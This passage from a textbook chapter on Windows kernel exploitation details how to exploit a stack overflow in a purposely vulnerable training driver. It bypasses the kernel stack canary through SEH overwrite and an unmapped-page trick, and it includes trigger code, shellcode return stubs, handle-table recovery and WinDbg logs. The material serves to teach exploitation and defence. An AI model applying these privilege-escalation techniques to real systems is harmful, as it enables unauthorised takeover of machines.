As this is a stack trace, it makes the most sense to read it in reverse. At [1], the function triggers the exception while in the TriggerOverflow() function. The function KiDispatchException() at [2] is the core exception handling function. It internally calls the RtlIsValidHandler() function that is used to validate the registered “handler address” specified in the EXCEPTION_REGISTRATION_RECORD (in this case, the handler is 0x41414141, since we overwrote it during the overflow). This function in turn invokes RtlLookupFunctionTable(), which looks for kernel modules to find a valid address range. If the handler address is located within a driver address range (between the start and the end addresses of a given kernel module), it begins to look for a valid registered handler. Of course, because we are specifying a user-land address (0x41414141 is under the 0x80000000 kernel stack base), RtlLookupFunctionTable() will return NULL, since it'll be unable to find any existing module/driver covering the given address range. When RtlIsValidHandler() detects that the aforementioned function has returned NULL, it immediately (perhaps due to backward compatibility issues) returns TRUE. We can deduce that the kernel routine doesn't check for the handler to actually be in kernel land—a very interesting behavior, since this means we can safely overwrite the EXCEPTION_REGISTRATION_RECORD with an arbitrary user-land address. Not surprisingly, the last frame, [3], shows the 0x41414141 address, signifying that the kernel has finally passed the control flow to our user-land-specified address where our privilege escalation payload is located. Now that we're sure this approach can also be used in kernel land, we'll need to devise a good way to trigger an exception that the __try/__except block can intercept.

Triggering the Exception

If we can generate an exception before the function returns (and thus before the function hits the canary check function), we'll be able to redirect the flow control of the vulnerable kernel path. Depending on the vulnerable function stack frame, there may be multiple ways to trigger an exception, either during or after the actual overflow. Usually, based on our experience exploiting user space, we can formulate two ways to trigger an exception before the function returns. We can either trigger an exception after the overflow, or trigger an exception during the overflow itself. Both of these methods have one or more preconditions that must be satisfied.

If we choose to trigger an exception after the overflow, we will need to rely on in-frame data corruption. While we're in the process of performing the stack buffer overflow, we're able to control not only the local frame but also a few upper function frames (based on the overflow length). We'll need to overwrite a data pointer or a critical integer offset located in any of the trashed frames. If, later, for example, the trashed pointer itself, or a pointer built up during a pointer-arithmetic operation made using the trashed integer, is referenced, it's likely that a memory fault will occur. This method is highly dependent on the vulnerable path and function frame layout, and thus cannot be generalized. In our example, the TriggerOverflow() function returns immediately after copying the buffer; thus we have no chance of triggering an exception in this manner.

Alternately, we can choose to trigger an exception during the overflow. Since the user-land stack has a fixed size, we can try to write above the stack limit until we hit an unmapped page, which in turn will trigger a page fault hardware exception. Of course, we'll need to control the “length of the overflow” to be able to specify a size huge enough to let the overflow run past the stack limit. This approach has been used quite often during user-land exploitation, most of the time when dealing with stack buffer overflow due to uncontrolled or partially controlled integer overflows that generate a large and uncontrolled memory copy. Since the kernel stack is also limited (12Kb on a 32-bit kernel) and, in our example, we can directly control the length passed to the RtlCopyMemory() function, it's tempting to think that this approach should also work in kernel space. However, it does not work, since, unlike working in user land, in kernel land not every memory fault is managed in the same way. The __try/__except blocks are mainly used to trap an invalid user-space-only reference and are not able to catch every type of memory fault.

Let's take a look at the crash log the debugger shows when we try to write above the current stack limit:

kdb> !analyze -v

BugCheck 50, {f62c3000, 1, 80882303, 0}

*** WARNING: Unable to verify checksum for StackOverflow.exe

*** ERROR: Module load completed but symbols could not be loaded for StackOverflow.exe

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.

This cannot be protected by try-except,it must be protected by a Probe.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: f62c3000, memory referenced.

Arg2: 00000001, value 0 = read operation, 1 = write operation.

Arg3: 80882303, If non-zero, the instruction address which

referenced the bad memory address.

Arg4: 00000000, (reserved)

Debugging Details:

-----------------------

WRITE_ADDRESS: f62c3000

FAULTING_IP:

nt!memcpy+33

80882303 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

As we can see from the fault analysis shown by the !analyze –v extension command, this time the BugCheck code is 0x50 (80 decimal), which is associated with the error PAGE_FAULT_IN_NONPAGED_AREA. This error simply indicates that a kernel path has referenced invalid kernel memory. Taking a look at the fault description, we can track down the affected code:

WRITE_ADDRESS: f62c3000

FAULTING_IP:

nt!memcpy+33

80882303 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

As one might expect, the faulting instruction here is the REP MOVS (Repeat Move Data from String to String) located within the core kernel memcpy() (RtlCopyMemory() in the source). Here, the instruction faulted while trying to write into 0xF62C3000, an address which lies within the unmapped page behind the 12Kb kernel stack.

Next, we'll look at the memory stack dump using the dd (Display Double-Word Memory) command in WinDbg:

kdb> dd F62C2F80

f62c2f80 4141414141414141 4141414141414141 4141414141414141 4141414141414141

f62c2fa0 4141414141414141 4141414141414141 4141414141414141 4141414141414141

f62c2fc0 4141414141414141 4141414141414141 4141414141414141 4141414141414141

f62c2fe0 4141414141414141 4141414141414141 4141414141414141 4141414141414141

f62c3000 ???????????????? ???????????????? ???????????????? ????????????????

f62c3020 ???????????????? ???????????????? ???????????????? ????????????????

f62c3040 ???????????????? ???????????????? ???????????????? ????????????????

As the preceding snippet shows, after the end of the kernel stack the code hits an empty page (starting exactly at the faulting address of 0xF62C3000). Since the kernel detects that the driver is trying to dereference an invalid memory address within the kernel itself, it views it as a kernel bug and fires a BugCheck. At this point, it seems as though none of the user-land approaches used to trigger an exception can be used unmodified against our dummy vulnerable example, since we need to force the kernel to dereference an invalid user-land address at any cost to be successful in our exploitation.

The key to solving this problem lies just around the corner, however, and is more straightforward than we would have thought. We'll simply need to trigger an invalid memory dereference during the copy of the offending buffer, only we must do so after the copy has triggered the overflow itself. How can we achieve this? Again, we can accomplish our goal by making use of the operating system's memory mapping capability. We can create a custom anonymous memory mapping using the function CreateUspaceMapping() in the Trigger32.c file. This function simply creates an anonymous mapping using the CreateFileMapping() and MapViewOfFileEx() APIs. We have to place the user-space buffer at the end of the anonymous map. We place the initial part of it in the valid page and the remainder in the next unmapped page. By doing this, we not only force the kernel to overflow the buffer in the first place, but we also contemporaneously force the system to fire an exception just after the overflow has been triggered. To better understand this user-space memory layout, see Figure 6.7.

Image

Figure 6.7 User-space layout during exploitation.

The following code is used to trigger the overflow and the page fault at the same time:

[ … ]

map = CreateUspaceMapping(); [1]

pShellcode = (ULONG_PTR) UserShellcodeSIDListPatchUser;

PrepareBuffer(map, pShellcode); [2]

uBuff = map + PAGE_SIZE - (BUFF_SIZE-sizeof(ULONG_PTR)); [3]

hFile = CreateFile(_T("\\.\DVWD"), [4]

GENERIC_READ | GENERIC_WRITE,

0, NULL, OPEN_EXISTING, 0, NULL);

if(hFile != INVALID_HANDLE_VALUE)

ret = DeviceIoControl(hFile, [5]

DEVICEIO_DVWD_STACKOVERFLOW,

uBuff,

BUFF_SIZE,

NULL,

0,

&dwReturn,

NULL);

[ … ]

At [1], the code creates the anonymous mapping followed by an empty page. Next, at [2], the code calls the function PrepareBuffer(), which simply fills the whole buffer with the shellcode address. At [3], the code sets the user-space buffer length according to the layout shown in Figure 6.7, in such a way that its last four bytes (ULONG_PTR on 32-bit systems) are placed within the empty invalid memory page just set up. After having prepared the buffer, the code gets a handle from the vulnerable device at [4], and triggers the overflow calling the DeviceIoControl() API, at [5], passing the DEVICE_DVWD_STACKOVERFLOW control code, the address of the buffer (within which lies the anonymous mapping), and the just-crafted buffer length. As opposed to the arbitrary overwrite scenario discussed previously, this time the shellcode cannot simply return to the caller, since the stack frame has been completely trashed and there is no valid path to return to. We have two main options at this point:

  1. Elevate the credential of the current process and set up a fake stack frame to emulate the user-land return code.

  2. Elevate the credential of a different controlled process and kill the current process from within kernel land without returning to the trashed frame.

We already demonstrated the first approach in the stack-overflow scenario in Chapter 4. In this example, we will instead take the second approach: Namely, elevate the credential of a different controlled process and kill the current process from within kernel land without returning to the trashed frame.

Let's briefly discuss how this approach can affect the user-land environment and the kernel shellcode, starting with the user-land environment. We have to consider that after the overflow has been triggered, the shellcode will kill the process without any chance to return to user land. For this reason, we will need to create a new process (e.g., a cmd.exe process) and track down its PID. We must take into account that we will need this PID later, when we'll be executing the kernel-mode shellcode. The PID can be grabbed at process creation time. When the CreateProcess() API is executed, the kernel stores the actual PID within the output parameter PROCESS_INFORMATION (in the dwProcessId field), as shown in the following code snippet:

static BOOL CreateChild(PTCHAR Child)

{

PROCESS_INFORMATION pi;

STARTUPINFO si;

ZeroMemory( &si, sizeof(si) );

si.cb = sizeof(si);

ZeroMemory( &pi, sizeof(pi) ); [1]

if (!CreateProcess(Child, Child, NULL, NULL, 0,

CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) [2]

return FALSE;

cmdProcessId = pi.dwProcessId; [3]

CloseHandle(pi.hThread);

CloseHandle(pi.hProcess);

return TRUE;

}

This function is straightforward. It initializes the STARTUPINFO and PROCESS_INFORMATION structures [1], executes the new process [2], and saves the PID of the new spawned process in the cmdProcessId global variable [3]. The environment is now set up properly.

We'll need to slightly modify the shellcode we presented in the section “The Execution Step,” in two different places. First, we need to locate the EPROCESS structure of the target child process. We can do this using the PsLookupProcessByProcessId() kernel API, passing the child PID as the first argument. The remainder of the shellcode core is the same as the original; it simply operates on the child kernel structures instead of the current process.

The second modification is related to the shellcode return. As stated before, the shellcode cannot return to the caller, but instead has to kill the current process because there is no longer a valid frame. To kill a process in kernel land, we can use the ZwTerminateProcess() kernel system call. The following snippet shows the API prototype:

NTSTATUS ZwTerminateProcess(

__in_opt HANDLE ProcessHandle,

__in NTSTATUS ExitStatus

);

We can pass the value 0xFFFFFFFF as the first parameter and an arbitrary exit status as the second parameter. The value 0xFFFFFFFF (-1) is a special HANDLE value that means “the current process.” This function cleans up any acquired kernel resources and frees the kernel structures allocated for the current process. The kernel will finally kill the current process, removing every related resource and scheduling a new one to run.

The Recovery: Fix the Object Table

The recovery step is mandatory on most kernel exploits. Every vulnerability and every exploitation vector has different requirements that force the exploit to fix resources during the post-exploitation phase. Recovery steps are so various that it is impossible to summarize them all. A few steps are tied to the data corruption, and others are linked to the unexpected operations that our payload can set off. What we can do here is try to help you better understand the direct consequences that an unexpected kernel operation made by our payload can set off. As we've seen, ZwTerminateProcess(), a function whose primary purpose includes freeing process-owned resources, can be used to terminate the current process to avoid having it return to the corrupted caller frame. One of the many resources available is the object table. The object table (also called the handle table) is a table that contains the opened process handles. This table contains any file, any device, and any other type of object handle that the process has opened (and never closed) during its lifetime. It tries to close them one by one before freeing the related structure. But what happens if one of these handles is already in use by a given kernel control path? The function simply puts the process to sleep, waiting for the resource to be released. And what happens if the object is in use by the same kernel control path issuing the ZwTerminateProcess() API? As one might expect, something bad happens: a process deadlock! This is exactly what happens when we invoke this API in our example. For some insight as to why it happens, let's take a look at the stack backtrace of this function:

f66e4204 80833491 nt!KiSwapContext+0x26

f66e4230 80829a82 nt!KiSwapThread+0x2e5

f66e4278 808f373e nt!KeWaitForSingleObject+0x346 [5]

f66e42a0 808f9662 nt!IopAcquireFileObjectLock+0x3e

f66e42e0 80934bb0 nt!IopCloseFile+0x1de

f66e4310 809344b1 nt!ObpDecrementHandleCount+0xcc

f66e4338 8093b08f nt!ObpCloseHandleTableEntry+0x131 [4]

f66e4354 80989fc6 nt!ObpCloseHandleProcedure+0x1d

f66e4370 8093b28e nt!ExSweepHandleTable+0x28 [3]

f66e4398 8094c461 nt!ObKillProcess+0x66

f66e4420 8094c643 nt!PspExitThread+0x563

f66e4438 8094c83d nt!PspTerminateThreadByPointer+0x4b

f66e4468 808897cc nt!NtTerminateProcess+0x125

f66e4468 8082fadd nt!KiFastCallEntry+0xfc [2]

f66e44e8 00411f54 nt!ZwTerminateProcess+0x11

f66e460c 8088edae 0x411f54 [1]

Again, since this is a stack trace, it makes sense to read it in reverse order. At [1], the shellcode (which is located in user land but which executes in kernel mode) calls ZwTerminateProcess(). At [2], the kernel path invokes the core function NtTerminateProcess(), which terminates the main thread and tries to free all of the process resources. At [3], the ExSweepHandleTable() function tries to free every object within the process object table; this function scans the table to find and close every opened handle, after first invoking the ExpLookupHandleTable() function internally to obtain the table. Subsequently, the ExSweepHandleTable() function takes every handle within the table, looks for the corresponding object, and tries to free it [4]. When the procedure passes over the device driver handle (the one referenced by the same path when the DeviceIoControl() system call was originally called), it realizes that the handle is in use and puts the process to sleep waiting for its release, [5], at which point the process simply hangs and can no longer be killed. Although this behavior doesn't interfere with the exploitation itself, it is never a good idea to leave a dead and unkillable process alive on a system.

We have a few options here to avoid this kind of problem. We can, for example, decrement the object's usage counter, thus tricking the kernel into believing that the object is not used; alternatively, we can directly remove the handle from the table. Both methods are valid solutions. For the sake of brevity, we will provide a brief description of only the latter method.

The object table is referenced by the ObjectTable EPROCESS field (which is located, for example, at offset 0xD4 within the EPROCESS structure on the latest version of Windows Server 2003 32-bit SP2). The first field of this structure (named TableCode) can address either the real table or an indirect pointer-to-tables map. Since every real table can host up to 512 handles, if the process has opened fewer than 512 handles the TableCode directly addresses the table. If the process has more than 512 opened handles, the TableCode addresses an indirect table which, in turn, hosts all of the pointers to the real tables (e.g., the first pointer addresses the 0-511 handle table, the second pointer addresses the 512-1023 handle table, etc.).

We can detect the TableCode type by looking at its least significant bit. If this bit value is one, the table is addressing a pointer-to-tables map; if it is zero, it is addressing a real table. Of course, in both cases the least significant bit will have to be zeroed before we dereference it, since the pointer is always page-aligned and the last bit is used only as a flag. It is now time for a small optimization. Since we are controlling the exploit process, we can force it to have fewer than 512 open handles, and thus the shellcode can assume that the TableCode directly addresses the real table. The last thing we will need to determine is the size of a single table entry. A table entry within the real table is of type HANDLE_TABLE_ENTRY and has the following layout:

typedef struct _HANDLE_TABLE_ENTRY

{

union

{

PVOID Object;

ULONG ObAttributes;

PHANDLE_TABLE_ENTRY_INFO InfoTable;

ULONG Value;

};

union

{

ULONG GrantedAccess;

struct

{

WORD GrantedAccessIndex;

WORD CreatorBackTraceIndex;

};

LONG NextFreeTableEntry;

};

} HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY;

Every table entry is eight bytes wide. Moreover, any in-use entry holds the address of the related kernel object in the former double-word (the first four bytes) and the access mask in the latter double-word (the second four bytes). When the entry is not used, the former double-word is zeroed and the latter double-word holds the NextFreeTableEntry index. Here we need to obtain the index of the offending handle (i.e., the one used to open the DVWD device) and nullify the first double-word entry. When we do this, the code in the ExSweepHandleTable() function passes through the entry without making any attempts to actually free the resource. The reference to the device object is lost forever, but the process can now exit gracefully. You can find the full code of the RecoveryHandle32() function in the Trigger32.c file. This code is called by shellcode before terminating the current process (before calling the ZwTerminateProcess() API).

Windows Server 2008 64-bit Overflow Scenario

As we've seen throughout this chapter, the 64-bit version of Windows introduced a number of improvements, and a few of them have, directly or indirectly, had an impact on the operating system's overall security. Let's start by taking a look at the TriggerOverflow() code on an x64 Windows environment. This is the actual function prologue:

dvwd!TriggerOverflow():

fffff880051ee16c 48895c2418 mov qword ptr [rsp+18h],rbx

fffff880051ee171 56 push rsi

fffff880051ee172 57 push rdi

fffff880051ee173 4154 push r12

fffff880051ee175 4883ec70 sub rsp,70h [1]

fffff880051ee179 488b0580dfffff mov rax,qword ptr [__security_cookie] [2]

fffff880051ee180 4833c4 xor rax,rsp [3]

fffff880051ee183 4889442460 mov qword ptr [rsp+60h],rax [4]

fffff880051ee188 8bf2 mov esi,edx

As we can see, a 64-bit environment is quite a bit different from a 32-bit environment. On an x64 system there is no longer a helper function that initializes the stack frame. The driver is compiled by default without a base-frame pointer (RBP is used as a general-purpose register), the SEH stack block disappeared, and the stack canary is installed by the function itself.

At [1], the function allocates the local stack frame. At [2], the master cookie is copied into the RAX register and then it is XORed with the actual stack pointer value (RSP) [3]. Finally, the cookie is stored within the stack to protect the return address at [4]. The main difference from 32-bit systems is the absence of the SEH block. On x64 systems (both in user land and in kernel land) an SEH block no longer gets installed into the stack frame. Since the x64 release provided the developers with a chance to remove a lot of weird things that had been hanging around for decades, the SEH implementation got a careful overhaul (i.e., a total redesign). We can say that SEH has now become table-based. This means a table gets created that fully describes all of the exception handling code within the module at compile time. This table is then stored as part of the driver header. When an exception occurs, the exception table is parsed by exception handling code to find the appropriate exception handler to invoke. As a result, there is no longer any runtime overhead (a performance improvement), and no function pointers are overwritten during a stack buffer overflow (a security improvement). At first, it appears that we no longer have a chance to bypass the stack canary protection. In at least some circumstances we do, indeed, have a chance! If the straight memory copy is done via RtlCopyMemory() and we are within a __try/__except block, as occurs in our example, the exploitation is still possible. This way of doing things may seem a bit odd, but thanks to the way that RtlCopyMemory() actually gets implemented on the x64 Windows kernel, it is still a possibility.

RtlCopyMemory() Implementation

The following is a snippet of the TriggerOverflow() function while the RtlCopyMemory() function is executed:

[ … ]

mov r8, rsi ; size_t

mov rdx, r12 ; void *

lea rcx, [rsp+88h+var_68] ; void *

call memcpy ; call the memcpy() function

[ … ]

Since we are dealing with an x64 program, the calling convention states that the argument must be passed via registers. In the preceding snippet, the TriggerOverflow() function passes the size via the R8 register, the source buffer via the EDX register, and the stack-destination address via the RCX register. Finally, it calls the memcpy() function (which is the binary implementation of the RtlCopyMemory() function).

Taking a look at the exported kernel functions, we can see that RtlCopyMemory(), along with RtlMoveMemory() and memcpy(), is actually implemented as a memmove() function. The memmove() function during the copy has to manage possible overlapping segments, and thus it is implemented using a copy-backward approach. Figure 6.8 shows a simple schema of the memmove() implementation.

Image

Figure 6.8 RtlCopyMemory() while accessing user-mode buffers.

The following is the beginning of the memmove() kernel function:

dvwd!memcpy():

fffff880`05ac0200 4c8bd9 mov r11,rcx

fffff880`05ac0203 482bd1 sub rdx,rcx [1]

fffff880`05ac0206 0f829e010000 jb fffff88005ac03aa [2]

[ … ]

fffff880`05ac03aa 4903c8 add rcx,r8 [3]

fffff880`05ac03ad 4983f808 cmp r8,8

fffff880`05ac03b1 7261 jb fffff88005ac0414

fffff880`05ac03b3 f6c107 test cl,7

fffff880`05ac03b6 7436 je fffff88005ac03ee [4]

[ … ]

fffff880`05ac0400 4883e908 sub rcx,8 [5]

fffff880`05ac0404 488b040a mov rax,qword ptr [rdx+rcx] [6]

fffff880`05ac0408 49ffc9 dec r9

fffff880`05ac040b 488901 mov qword ptr [rcx],rax [7]

[ … ]

The first action that the function performs, at [1], regards the source/destination buffer address comparison—more precisely, it subtracts the destination buffer address from the source. If the destination buffer address is higher than the source buffer address, the result will be negative. Since, in the vulnerable function, we will be copying from user land (source buffer) to kernel land (destination buffer), the result of the subtraction will always be negative and the branch at [2] will always be taken. Since, in respect to the destination buffer, the source buffer is located at a lower address, memmove() implements a backward copy to preserve a possible overlapping buffer. In this case, of course, no overlap takes place, since the two buffers are located in different addresses, but the function simply doesn't care about it and checks only for the worst case scenario. Since the function is performing a backward copy, it adds the buffer size and the source buffer pointer at [3]. After managing the copying of any unaligned trailing bytes, it then jumps into the main copy cycle at [4]. At [5], the function starts to lower the destination buffer address stored in RCX. Next, at [6], it copies eight bytes of data at a time into the RAX register, and at [7], it stores the data back in the destination buffer. Since the RCX register is used to calculate both the source buffer and the destination buffer (exploiting the subtraction made at [1]), the function needs only to decrement that register while performing the copy.

Note

Actually, the assembly implementation of RtlCopyMemory() is bigger than the tiny code snippet shown in the preceding paragraph. The full code takes into account a few optimizations, together with a few caching issues, when huge buffers are involved in the copy.

Straight Copy versus Indexed Copy

Taking into account the RtlCopyMemory() issue and the ability to interrupt the user-to-kernel copy within a __try/__except block using an invalid user-land mapping, we can easily transform a straightforward plain memcpy()-style overflow into a controlled index-based buffer overflow. We saw in the “Stack Buffer Overflow” section that we can easily turn an index-based overflow into a successful exploitation, thereby bypassing canary protection.

Here, similar to the 32-bit case, we will need to play a bit with the invalid mapping. This time only the “end” of the buffer must be present in the mapped anonymous area. The remainder of the buffer must be virtually located in the previously unmapped area. Since the copy starts from the end of the buffer, if we can control the buffer's final size we will be able to induce an arbitrary controlled index-based overwrite; in so doing, we can overwrite just the return address, leaving any other memory location untouched. Figure 6.9 shows how we must set up the buffer to bypass the canary protection scheme.

Image

Figure 6.9 Buffer layout during x64 stack overflow exploitation.

Recovery: Return to Parent Frame

Since in this scenario we can totally control the copy, and since we are able to overwrite just the return address without trashing parent frames, we can adopt a new, simpler strategy to recover the original control flow after executing our custom shellcode payload. We can simply add an assembly stub that will be executed before the original payload. This assembly stub invokes the C payload and regains control when the payload has been executed; after that, the stub jumps (using an absolute JMP assembly instruction) into the TriggerOverflow() parent function. Of course, the stub must be initialized before the exploitation takes place.

The exploit code makes use of a similar technique, which we used previously, to relocate the Kernel Executive symbols. First, it has to load the driver into user-land memory, and later, using a pattern matching signature, it needs to locate the offset where the parent function is located. Finally, using the driver load base address information, it can dynamically relocate the absolute address of the parent frame function and properly set up the stub. The following code snippet shows a live WinDbg session we can use to simulate the aforementioned procedure:

1: kd> bp TriggerOverflow

1: kd> g

Breakpoint 0 hit

ioctlsample!TriggerOverflow:

fffff880`05ac416c 48895c2418 mov qword ptr [rsp+18h],rbx

1: kd> ? poi(rsp)

Evaluate expression: -8246242033348 = fffff880`05ac413c

1: kd> u poi(rsp)-5 L2

fffff880`05ac4137 e830000000 call dvwd!TriggerOverflow (fffff880`05ac416c)

fffff880`05ac413c 8bd8 mov ebx,eax

In the preceding code, we set up a breakpoint to the vulnerable function. When the breakpoint gets hit, the return address has been already pushed into the stack. Using the poi command, which prints the pointer-sized data from the specified address, we can individuate the correct return address. The following command shows the parent function body near where it calls the vulnerable function. The stub must be set up in order to return to the FFFFF88005AC413C address, which is handled by the instruction following the function call. Since the return address was already popped up during the call of our payload, the stub has only to execute a simple absolute jump (JMP instruction) to that address. Of course, since we cannot debug the target box, we have to build the return address using the ZwQuerySystemInformation() API to get the actual base address of the driver. After we have the base address, we can just relocate the RVA to compute the final address. The final stub will look like this:

CALL ShellcodePrivilegesAdd

MOV R11, fffff88005ac413c

JMP [R11]

Summary

In this chapter, we focused on local Windows kernel exploitation. The chapter was divided into three parts. The first part introduced Windows kernel fundamentals and how to prepare a working environment. The second part showed how to elevate the privileges of an arbitrary process, and the third part explained how to exploit different types of kernel vulnerabilities. Since Windows has gone through a lot of different releases, this chapter focused on two server platforms: Windows Server 2003 32-bit SP2 and Windows Server 2008 R2 64-bit.

Windows is a very interesting operating system rich with features and protection schemas. Moreover, because Windows is a closed source operating system, it takes a lot of effort to deal with its internal structures and undocumented system behaviors. For those reasons, before we began our analysis, we showed how to set up a typical debugging environment. We introduced how to configure a kernel debugger (WinDbg) as well as how to properly set up the virtual machine that hosts the target vulnerable kernel. Next, we introduced the DVWD package, which contains the vulnerable crafted codes we tried to exploit. Then the chapter covered a few Windows kernel concepts that are important to understand before moving on to exploitation execution.

With that information covered, we moved on to the execution step and discussed the three different ways to elevate the privileges of a target process: SID list patching, Privileges patching, and token stealing. We closed the chapter with a section titled “Practical Windows Exploitation,” where we discussed the exploitation techniques we can use to redirect the control flow of the vulnerable path toward our payload located in user land. We covered how to take control of an arbitrary memory overwrite and how to exploit a stack buffer overflow. In addition, we saw how Windows implements kernel-space protections such as the kernel-space stack canary (kernel /GS) and the runtime protection of critical structures, together with the ability to bypass them.

Endnotes

1. Gates B, 2002. www.microsoft.com/about/companyinformation/timeline/timeline/docs/bp_Trustworthy.rtf.

2. Paget C, 2002. Shatter Attack – How to Break Windows, http://web.archive.org/web/20060904080018/http://security.tombom.co.uk/shatter.html.

3. Eriksson J, Janmar K, Oberg C, 2007. Kernel Wars, http://www.blackhat.com/presentations/bh-europe-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf.

4. Barta C, 2009. Token Stealing, http://csababarta.com/downloads/Token_stealing.pdf.

5. Santamarta R, 2007. Exploiting Common Flaws in Drivers, http://www.reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1.

6. Jurczyk M, Coldwind G, 2010. GDT and LDT in Windows kernel vulnerability exploitation, http://vexillium.org/dl.php?call_gate_exploitation.pdf.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset